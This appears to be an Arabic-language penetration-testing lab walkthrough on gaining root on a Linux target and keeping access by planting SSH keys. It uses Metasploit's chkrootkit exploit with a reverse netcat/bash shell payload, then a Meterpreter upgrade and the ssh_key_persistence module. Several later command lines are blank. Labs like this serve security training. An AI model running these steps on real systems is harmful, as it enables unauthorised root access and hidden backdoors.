🧪 المختبر العملي 29 : تأسيس الثبات على Linux (Establishing Persistence On Linux Lab)

🎯 الهدف الأساسي: تأسيس آلية ثبات (Persistence) على نظام Linux مستهدف بعد الحصول على صلاحيات root، وذلك عن طريق زرع مفاتيح SSH، مما يضمن وصولاً مستمرًا ومشفراً للمهاجم حتى بعد إعادة تشغيل النظام أو تغيير بيانات الاعتماد.

🔧 الأدوات المستخدمة:

  • MSFconsole: واجهة Metasploit الرئيسية.

  • Exploit Module: أي وحدة استغلال تمنح Meterpreter Shell بصلاحيات root (مثلاً: linux/local/chkrootkit من.

  • Meterpreter Payload: للحصول على تحكم كامل.

  • Post-Exploitation Module: post/linux/manage/ssh_key_persistence.

📜 خطوات التنفيذ:

📊 مرحلة الاستغلال ورفع الصلاحيات (Exploitation & Privilege Escalation)

  1. 🚀 بدء تشغيل MSFconsole والحصول على Meterpreter Shell بصلاحيات root:

    • ابدأ msfconsole:

      msfconsole -q
    • حدد عنوان IP للهدف.

    • 🔑 استخدام وحدة استغلال chkrootkit لرفع الصلاحيات والحصول على Shell:

      use exploit/linux/local/chkrootkit
      set RHOSTS [Target_IP_Address]
      set LHOST [Your_Kali_IP_Address]
      set LPORT 4444
      set CHKROOTKIT_PATH /usr/local/bin/chkrootkit # المسار الكامل لـ chkrootkit
      set PAYLOAD cmd/unix/reverse_netcat # أو cmd/unix/reverse_bash
      exploit
    • إذا نفذت هذا الأمر، ستحصل على Command shell session 1 opened بصلاحيات root.

    • 🔧 ترقية الجلسة إلى Meterpreter:

      • أرسل الجلسة إلى الخلفية: background

      • استخدم sessions -u 1 لترقية الجلسة 1. ستفتح Meterpreter session 2 opened.

      • تفاعل مع جلسة Meterpreter الجديدة: sessions 2.

      • تحقق من صلاحياتك: getuid. يجب أن يظهر uid=0(root).

📊 مرحلة ما بعد الاستغلال: الثبات (Persistence)

  1. 🔧 إرسال جلسة Meterpreter إلى الخلفية:

    • للتحقق: sessions (يجب أن تظهر جلسة Meterpreter بصلاحيات root نشطة).

  2. 💡 استخدام وحدة post/linux/manage/ssh_key_persistence لتأسيس الثبات:

    • البحث عن الوحدة:

    • 🔑 استخدام الوحدة:

    • ⚙️ تعيين الخيارات:

    • 🚀 تشغيل الوحدة:

    • إذا نفذت هذا الأمر، ستقوم الوحدة بإنشاء زوج مفاتيح SSH (عام/خاص) على النظام المستهدف، وتثبيت المفتاح العام لضمان الثبات.

    • ستُعرض لك معلومات حول المفتاح الخاص الذي تم إنشاؤه. 🔑 المعلومة الذهبية: احتفظ بالمفتاح الخاص لاستخدامه لاحقًا.

📊 التحقق من الثبات

  1. ✅ قطع الاتصال وإعادة الاتصال باستخدام المفتاح الخاص:

    • اخرج من Metasploit:

    • حاول الاتصال بخادم SSH على النظام المستهدف باستخدام المفتاح الخاص الذي تم إنشاؤه:

    • إذا نفذت هذا الأمر، يجب أن تتمكن من تسجيل الدخول مباشرة إلى النظام المستهدف بصلاحيات root دون الحاجة إلى كلمة مرور.

    • ملاحظة: يجب أن يكون المفتاح الخاص آمنًا (صلاحيات 600) قبل الاستخدام: chmod 600 /path/to/private_key.

نقاط التحقق:

  • يجب الحصول على Meterpreter Shell بصلاحيات root.

  • يجب استخدام وحدة ssh_key_persistence بنجاح.

  • يجب أن تتمكن من إعادة الاتصال بالنظام المستهدف باستخدام المفتاح الخاص الذي تم إنشاؤه.

Last updated